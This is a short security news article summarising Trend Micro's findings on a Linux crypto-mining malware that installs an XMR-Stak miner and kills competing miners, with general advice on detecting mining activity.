- Security experts from Trend Micro found a new crypto-mining malware that kills other malicious miners
- While beneficial to the victim, the behaviour is entirely selfish by the attackers as it frees up resources for their own miner
Trend Micro’s security analysts have identified a new strain of Linux crypto-mining malware. It targets servers, installing the XMR-Stak Cryptonight cryptocurrency miner. The researchers have observed that it is also killing other coin miners that are present on the infected machine.
Discovered in a honey pot
Researchers detected the malware as they were doing a routine log check. It happened after they have spotted a script in a honeypot that started downloading a binary connected to a domain. As it turns out, the binary was a modified version of the cryptocurrency miner called XMR-Stak. In a published analysis of Trend Micro, they state:
“We found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS. It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.”
The script did not stop at downloading their own miner. It disabled other crypto-mining malware affecting the machine at the time of infection, and blocked processes trying to connect to known cyber crime linked IP addresses.
Similarity to other threats
As it turns out this code has similarities to other threats. Specifically, the researchers have observed similarities of this malicious coin miner to Xbash. Xbash is a malware family that was also discovered by Trend Micro in September last year. This malware combines cryptocurrency mining, ransomware, worm, and scanner capabilities as it attacks Linux and Windows servers. According to researchers, the threat’s code also has near identical script to KORKERDS, which is another crypto-mining malware that they discovered back in November 2018.
However, there are also a few differences. The malware’s new script has now simplified the routine in which the KORKERDS loads the Linux coin malware sample and downloads and executes files. Plus, it didn’t install a rootkit on the infected machine nor did it uninstall security solutions – allowing the victim to keep protecting itself against rival attackers. The script’s kill list targeted the KORKERDS as well as its rootkit component. This only shows that people behind the coding of script are trying to maximize their profits as they are competing with KORKERDS’ authors.
Defending against Linux crypto-mining malware
With the use of an endpoint management and security platforms, security professionals can work against Linux crypto-mining malware. This way, they can monitor endpoints for any possible suspicious behavior.
As for organizations, they can use security information and event management (SIEM) tools as this can notify security teams if there are high central processing unit (CPU) or graphics processing unit (GPU) usage as these are key indicators of cryptocurrency mining activities.